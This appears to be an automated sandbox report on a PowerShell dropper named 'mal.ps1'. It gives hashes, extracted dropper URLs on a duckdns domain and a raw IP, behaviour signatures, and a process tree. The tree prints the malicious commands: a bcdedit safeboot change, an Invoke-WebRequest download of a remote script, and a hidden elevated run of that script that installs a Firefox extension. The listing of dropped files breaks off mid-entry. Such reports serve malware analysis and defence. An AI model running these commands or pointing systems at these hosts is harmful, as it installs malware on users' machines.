Overview

overview

10

Static

static

10

mal.ps1

windows7-x64

8

mal.ps1

windows10-2004-x64

10

Resubmissions

02/05/2024, 13:37

240502-qw5lbaaa5x 10

02/05/2024, 10:58

240502-m25aysfd3w 10

Analysis

  • max time kernel
    142s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/05/2024, 10:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    mal.ps1

  • Size

    91B

  • MD5

    a8e770d7cb2e69cfd99f8c9382b2d2dd

  • SHA1

    018b86e8953e2c4000ffc16f27b2d0bbcb6498bd

  • SHA256

    85aa86e6398c5d19b1305776a141b46f813d260b60ae162ab8b023ea88b0a6ee

  • SHA512

    0731faea423d518d4f25dbd3702adc913bbfb00eac49ca280626a2de0bdd6937f5defb37a18cdf3e1e5b02ea55a8cc14beddfec8da7b24ce462acc2d48a00981

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://839209384903298340.duckdns.org/contador.php
exe.dropper

http://64.23.163.215/navegador_cifrado.xpi
exe.dropper

http://64.23.163.215/portable.zip

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Powershell Invoke Web Request.

    execution
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 20 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\mal.ps1
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4472
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\29389023.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3984
      • C:\Windows\system32\bcdedit.exe
        bcdedit /deletevalue {current} safeboot
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2204
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Invoke-WebRequest -Uri 'http://64.23.163.215/plug3.ps1' -OutFile 'C:\Users\Public\Documents\chrome.ps1'"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4016
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Start-Process 'powershell.exe' -ArgumentList '-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Public\Documents\chrome.ps1""' -Verb RunAs"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4704
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\chrome.ps1
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5000
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" C:\Users\Public\Downloads\bloydw29z3fqau5k.xpi
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4396
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" C:\Users\Public\Downloads\bloydw29z3fqau5k.xpi
              6⤵
              • Checks processor information in registry
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4624
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1472 -parentBuildID 20240401114208 -prefsHandle 1972 -prefMapHandle 1964 -prefsLen 25457 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf76cbb2-278c-419a-b620-b5c8149ccca7} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" gpu
                7⤵
                  PID:2992
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2460 -prefMapHandle 2456 -prefsLen 26377 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b466449d-712d-42a0-aa96-bc63b2e2ff70} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" socket
                  7⤵
                    PID:1800
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3104 -childID 1 -isForBrowser -prefsHandle 2916 -prefMapHandle 2972 -prefsLen 26518 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5040f3e0-b09e-4a83-817a-7c548a1031d2} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" tab
                    7⤵
                      PID:752
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3468 -childID 2 -isForBrowser -prefsHandle 3992 -prefMapHandle 3988 -prefsLen 30922 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {405b7b8f-77cb-4eac-8967-4972cef5e521} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" tab
                      7⤵
                        PID:3048
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4636 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4624 -prefMapHandle 4620 -prefsLen 30922 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f92f071f-7722-4427-9701-fbd71e0f469c} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" utility
                        7⤵
                        • Checks processor information in registry
                        PID:5264
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5164 -childID 3 -isForBrowser -prefsHandle 5152 -prefMapHandle 5136 -prefsLen 27096 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc96a104-33e9-441a-9b28-85facea71583} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" tab
                        7⤵
                          PID:6056
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5300 -childID 4 -isForBrowser -prefsHandle 5308 -prefMapHandle 5312 -prefsLen 27096 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d239a74-00e8-4988-afa4-556694cfd149} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" tab
                          7⤵
                            PID:6068
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5492 -childID 5 -isForBrowser -prefsHandle 5500 -prefMapHandle 5504 -prefsLen 27096 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6909a7a-d9b7-4d7b-a39b-c7371dac0e6d} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" tab
                            7⤵
                              PID:6080
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5088 -childID 6 -isForBrowser -prefsHandle 4304 -prefMapHandle 6248 -prefsLen 28467 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fe99277-339d-4686-a514-864f2bb41b18} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" tab
                              7⤵
                                PID:3944
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6628 -childID 7 -isForBrowser -prefsHandle 6692 -prefMapHandle 6624 -prefsLen 28467 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6c854ee-462a-4545-9cf8-0c2a4353561e} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" tab
                                7⤵
                                  PID:5352
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7016 -parentBuildID 20240401114208 -prefsHandle 6708 -prefMapHandle 6940 -prefsLen 32777 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0519da0-c516-46e3-8ccc-a5ab1a98cc10} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" rdd
                                  7⤵
                                    PID:3204
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7024 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 6952 -prefMapHandle 6948 -prefsLen 32777 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff48366f-92de-4b77-be33-b017402a8d24} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" utility
                                    7⤵
                                    • Checks processor information in registry
                                    PID:5084

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                        Filesize

                        3KB

                        MD5

                        556084f2c6d459c116a69d6fedcc4105

                        SHA1

                        633e89b9a1e77942d822d14de6708430a3944dbc

                        SHA256

                        88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                        SHA512

                        0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        d5a6408e58a8e6cdcac441b2724bdeea

                        SHA1

                        c32347262903a5db5422c41c280fe975731155a1

                        SHA256

                        6927aa1bd6f5b470b786b77ac7deac1ac4afcfa7650bc5c72358b3e8462e32d3

                        SHA512

                        f630fa6616ed5aeb1c875f1573de5ca3db917ff6b2d5cb8d3da37ae9e45104a8ebf46b2504d1281b9d3b6705bbf3422c9b40c20b64417ef932c68b314e3aee14

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        9843d1de2b283224f4f4b8730ccc919f

                        SHA1

                        c053080262aef325e616687bf07993920503b62b

                        SHA256

                        409d2853e27efaa5b7e5459a0c29103197e9d661338996a13d61ca225b2222d1

                        SHA512

                        13d5809d2078ecd74aec818b510a900a9071605863b0a10037b3a203b76ea17598436ca5049cd13cf3442352670b21d386e84a88bece36e3440d408f123475de

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        64B

                        MD5

                        a4bd47f3f9127aeb13e176532cbb7bef

                        SHA1

                        a6de03fbacb57ebecf88cda2d95003cd5bfe7276

                        SHA256

                        0c281fca6f2850a7adfe643d2a0166068a7548d9c2cde3b4744cb4a9d6f0a75d

                        SHA512

                        2450330696865af3e1f1b09f9817bb600b6630c37aaa6ed2d4bb883135937afd1fed1f2612d3cb74ff7d52ae986ffc27a5a6cf4a1ca783b77ece80ab8dc26148

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\k6zex9vv.default-release\activity-stream.discovery_stream.json
                        Filesize

                        19KB

                        MD5

                        da3be99a63e9d75c85b507a2340a22fe

                        SHA1

                        099524aee4f046c741320c632165e9f361460828

                        SHA256

                        eaf38fe9d7e80e7be9c0f90b26d2b75dd51cba770e8eba8a3e2dcc2458181ed3

                        SHA512

                        0fd66d4d954adbb84966441c5c0911c96ee5036baf7546a6c9231d55327a0d5969ae47cb1a840b0efc4a74fd21528cd086d61378ed4c6b1f74e4faf419e8d05d

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rhnmctlm.tcs.ps1
                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\tmpaddon
                        Filesize

                        479KB

                        MD5

                        09372174e83dbbf696ee732fd2e875bb

                        SHA1

                        ba360186ba650a769f9303f48b7200fb5eaccee1

                        SHA256

                        c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                        SHA512

                        b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
                        Filesize

                        13.8MB

                        MD5

                        0a8747a2ac9ac08ae9508f36c6d75692

                        SHA1

                        b287a96fd6cc12433adb42193dfe06111c38eaf0

                        SHA256

                        32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                        SHA512

                        59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
                        Filesize

                        2KB

                        MD5

                        483eaae863c709f3f7f96e6e01892867

                        SHA1

                        bbbeb0315c29a686e6efd464086081a26703dcf4

                        SHA256

                        301bc2def4e57e94a311a79999dc375605e5e2177b382b986d8e3532b2f69c99

                        SHA512

                        26eaf033e12570a2a18558277d754142827c591aee0ec0ce76437201a339c6b029efeded99ace10f455e461dcabe5e2e1e322a60734c55d5fea7c336c35a64e9

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk
                        Filesize

                        2KB

                        MD5

                        87a428b638ccfea68b0f82069780ecf9

                        SHA1

                        fab1e935e5ad084e306e01a7d6e96d8b4e7e72dd

                        SHA256

                        6f6192355da58182202d208b7e2811cd8bc138cf4103fe0b0d83e160eae92acb

                        SHA512

                        2b35a90133af6742fa26b2de6331808d5f74bb519d28d5fa28cb88cb118efc83e44978bef1314c777d4358938ed7d3db864f247814d1342016bfd4f25b6427fd

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\AlternateServices.bin
                        Filesize

                        7KB

                        MD5

                        6173f9acaef3f1f458855e8cfe00a143

                        SHA1

                        733776b0f6662369576a6af8748dc2ecde3b318d

                        SHA256

                        7c73faa3bedd0bd630f9c2ea6dc7c2567ca40141929f3cfe1788a2e72ac53484

                        SHA512

                        726ec60a874cd669dc6b04a6c85357f761e6dbdea4f322690673bb8be859fab4870db0c8ce645a4e3702e1f4533277f95a035d6752af085804a9fdd51af25192

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\datareporting\glean\db\data.safe.tmp
                        Filesize

                        5KB

                        MD5

                        637f842fa07b8d78d2ae9e7828329581

                        SHA1

                        5bd6691628a19cd507d69146bd3b9f92328ba413

                        SHA256

                        ec62be96a53e5d187a9eabdfaea7532d36228af2572fde6d97f8e4cdbe4e5faf

                        SHA512

                        9e12fa5ebb4ecc97bb6a7a572d1e8c2bc48afa7d33d0f276290c148453f55b4db4e6a4db4a34255170859dba3fa9eabd93fe1b396960243816b43d0d039d3a8d

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\datareporting\glean\db\data.safe.tmp
                        Filesize

                        6KB

                        MD5

                        1668cbbc4b83c9c44ab90f22069bd616

                        SHA1

                        a793f34662196e4c2c5248b03e3213c28673699c

                        SHA256

                        35e87d1bc91498e57e7363166adceaefabfecd1914256f54909aee1a21e6c2b4

                        SHA512

                        b6364a6fd80ae6eca430b8bd28793d2a0e3f86a0d2ae3f3c758e7a814b6ee5d1edd68eaa9bdb0093f5dd7fb28768814d17312d06208d0ee7766ebd860c0b71ff

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\datareporting\glean\db\data.safe.tmp
                        Filesize

                        7KB

                        MD5

                        2de6363893f6b14a1c3f4616dbc5596a

                        SHA1

                        b65e8bb1d26db6bae7ce20e4c3c9d9bdab54d68e

                        SHA256

                        79f1f4808aca1bf7ea9c37e45ffe9af8bfd54795212816eadf6f7cd21a865bb6

                        SHA512

                        1474afaa2c3bf889dd861192b41933ad2a8d3d0c339f3f05883561ae5cab1913c970e776fbd5561abc6bbdd5d7f64f7a3729564c7c26ad9e2b6272329d80a425

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\datareporting\glean\pending_pings\046d03c3-a778-4de0-901f-a1dd1a775b9f
                        Filesize

                        24KB

                        MD5

                        c4396e29890cb91db39996e2e984b8f2

                        SHA1

                        d2f9746ed495dbafaa8838afaeba22430079ba51

                        SHA256

                        8c530c56d8a95ad3da98a3d3d21e634c9ea0b490f3eaa668825b3d513d1d68ae

                        SHA512

                        de6ef9d198858815c8c4edaac0215f4636ee316968f22ea2c1430540dab2ff6e253504fe86e15b9250408c7f52dd77e4405600f99ed9d6c8b01ac75e2a5bb7eb

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\datareporting\glean\pending_pings\696ab457-4f1a-43c5-a425-f3b5c9b16e48
                        Filesize

                        982B

                        MD5

                        263a04aadd44af2248a24d8d16a41e0d

                        SHA1

                        f5d7219f370bb9823d3f5fd735fb7c12439ac055

                        SHA256

                        8a066255561d9214603d6e4e986f50ae5dddccb199291e751f5db32b415ca2ee

                        SHA512

                        2080746b53623d834262cf7bca8c15e4517bd76a18e7e22d96ad0c3a80724cfa8f0337246764762b0f8ab3ec4a72d4a471554e6f014fb3b955af79f35d6006d3

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\datareporting\glean\pending_pings\84f646cb-0d9a-498e-8baa-9e3971d05667
                        Filesize

                        671B

                        MD5

                        c14ee22ba5428675bc89f29a7c58ec3d

                        SHA1

                        4bb43d87cc4cdc113a811dc741883121d6938187

                        SHA256

                        e002b8e1b7503cb17802bbc0b6144c1eb10ebc568bbb1f9d54f93e70eff62b3a

                        SHA512

                        be130f87c16e4c0e555ee62f7f212fa14bbdfd3f417cc9234c31a9343e871fab7ebc5798b958ea6ebaa24851062ac29839135526b005cdc6cd69f9c4d5ff9a49

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\extensions.json
                        Filesize

                        39KB

                        MD5

                        3484513d624aa4b50adffb5af1aadfc6

                        SHA1

                        219090d59184507cab50f1e9fb5b3bf404cf8a1f

                        SHA256

                        193515f1b3342f97f9bb6fd55db4f68e841ace7451b1e78599bc6f68b04d7154

                        SHA512

                        71470c1370cdf6aa9e3bab14037ff593c43279051f97c1a21b69629f652e9d6ca3a36af611d63716004bfac53dc9633a2ff4515863d0d88b9ee41ff6425eae38

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
                        Filesize

                        1.1MB

                        MD5

                        842039753bf41fa5e11b3a1383061a87

                        SHA1

                        3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                        SHA256

                        d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                        SHA512

                        d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
                        Filesize

                        116B

                        MD5

                        2a461e9eb87fd1955cea740a3444ee7a

                        SHA1

                        b10755914c713f5a4677494dbe8a686ed458c3c5

                        SHA256

                        4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                        SHA512

                        34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
                        Filesize

                        372B

                        MD5

                        bf957ad58b55f64219ab3f793e374316

                        SHA1

                        a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                        SHA256

                        bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                        SHA512

                        79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
                        Filesize

                        17.8MB

                        MD5

                        daf7ef3acccab478aaa7d6dc1c60f865

                        SHA1

                        f8246162b97ce4a945feced27b6ea114366ff2ad

                        SHA256

                        bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                        SHA512

                        5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\prefs-1.js
                        Filesize

                        8KB

                        MD5

                        f88ac3f4c84510536b1da2299ad1e5b8

                        SHA1

                        81e345b53da14f1733fb318e439553915df3a065

                        SHA256

                        73b48ab19f9a92805d6584915d4652ccd5f1f202b026cffeb9f575b9b5870a57

                        SHA512

                        e1b871f1e032e82fefebff867eabc43f87a5593f278cdd28bac72754ef3bd6a2c1b756caa791205f8691bcfaeed712c5ff17e13af72224d6c5b97d10200b7fea

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\prefs-1.js
                        Filesize

                        9KB

                        MD5

                        4035c6bdf82553ec72367ce2796e468c

                        SHA1

                        47e6465975bf0837a1c82921340064fdfbfd4e3c

                        SHA256

                        3e3be55815edcc0d07bc445640725ec77ed3f46723daf2beec414a73b98ab976

                        SHA512

                        9bed153756bcb4c22dc260e792cc29173ba34b19569020bdc1f9b2d0ae7e715afe58d171af86fbfe95c12d68c21aba8022b13509569ab343a7dee152276510cc

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\prefs.js
                        Filesize

                        8KB

                        MD5

                        f3a5730ac1d1dbb86df5023e67c4d1d9

                        SHA1

                        38c0f13f275783245a5332caa9c33db2318efc81

                        SHA256

                        a8f9f363c837b7651012fc9eeb37f64cafd26f436d282bb4bf7ac4317b74bd07

                        SHA512

                        a1e95b6729c4bcf2b25b8e06f52b64d9a4009980bb99c8d91314a2ec093d00eb39bf5bfcb17ebe417e33629a7a6901a1e55ad7e87827bda8fbf86c0669f3adb1

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\sessionstore-backups\recovery.baklz4
                        Filesize

                        1KB

                        MD5

                        918d87d753c53dc62f52d761e68cd186

                        SHA1

                        5901fd363a29393271bcdb8e87dc8c232e1eaeaa

                        SHA256

                        75b63b928551c6c67605fd48c5702ffb22d4ce3644014ef0687f0ce876c8966f

                        SHA512

                        919e0b4273b20d1d6ef048cc257fa70ae3f815aec35d2f62060390410e25906e6d77ec39bdb930849a6a147ec747760749303322ad0ce0b3665353ab43a77f41

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\sessionstore-backups\recovery.baklz4
                        Filesize

                        1KB

                        MD5

                        f3f19146917ea234124f654270b9ec63

                        SHA1

                        cf01210beb47e834ce61b35c00938fc12db33c72

                        SHA256

                        d3b114679141b5fca963135735ce3d0e90b5a1734eab12647b8b92f56fd3d23a

                        SHA512

                        0e374b6b6b1c1b1b085ea9325eb0d61ce79fc1500e91f0b4cd5348e7158621d93797e8c6af9fb0738bfb9706e742c0eae28d19392f179ab7290df887af7e6a10

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\sessionstore-backups\recovery.baklz4
                        Filesize

                        1KB

                        MD5

                        f9214413b8901bb8cd66e85dfc7d3144

                        SHA1

                        b106edd428e363fd6692c28fe885c286e54530dc

                        SHA256

                        b27cc49c23eb44dbefd0795ff90122782f433666e0724b1522e303a89d2b513b

                        SHA512

                        2d52cfcbe4a08dadaba6fdeb2280e0002fd81ea6038d50031390df752b7fea456caf46a49a27f34f1ac230314f23cca61cdad99f068eea8878af189af76be3f0

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\sessionstore-backups\recovery.baklz4
                        Filesize

                        2KB

                        MD5

                        281ea6ef58bdea8eb65322bc16709aa7

                        SHA1

                        0a096b16915bd141e4e6204f49033b8686c98609

                        SHA256

                        6d948be3e559ea0da62181de7398b58761cc6fc428a8250cadca730c503cdff5

                        SHA512

                        aec75362394254161c838aaab08aaf20aee4c8cd52596e75ef4d43abdadaeec9b65f8c1d23b203b8650f3c3db4ec9fc9820dfb7796c31209b22903ddaffc4fcb

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\sessionstore-backups\recovery.baklz4
                        Filesize

                        2KB

                        MD5

                        f696357381a86b0863ecea87fdbd3384

                        SHA1

                        d368f5a1210d9fd6bcb681d3739c015b072a06aa

                        SHA256

                        20c52d558283a94bb1bbb8adacc1aa2d4cac2863959a84520d1560cce4e26636

                        SHA512

                        cdae0e62a37f781fa2346b95f8514ac88c560af387a8f59f2cb4eababa1f724fa883b8402395e7cad75d0d77ff5e4eb24ad4cbdecd0131fd8d8731ea11c4d716

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k6zex9vv.default-release\sessionstore-backups\recovery.baklz4
                        Filesize

                        4KB

                        MD5

                        8f4c7b7d6041d67f211795a669f0607a

                        SHA1

                        3fec78a034cc710f8d47eed2ff82e078f7cedd91

                        SHA256

                        97c04528d9755b3ee066dfdab7ea1cb07d2c34d1c7df7c7790439752f8ee1582

                        SHA512

                        201c923bb6b8d108b9a6371a66a2455f31fbbf631dc1a499d7ec0ef386070508dd75223c2c9e8dbc47ba05fd2d4171d65458411c1b8a5b6689d19ef3a792b91f

                        Download Submit

                      • C:\Users\Public\Documents\29389023.bat
                        Filesize

                        373B

                        MD5

                        3f3a4d18c7ec526f4b51340d6a5523ab

                        SHA1

                        f163c15194ac269c209aac2d1ab1b95166b0bc1b

                        SHA256

                        9b0c5f8938f4459f678fa0352c66db2ba95bda300d9b331b7904d5647f1122c8

                        SHA512

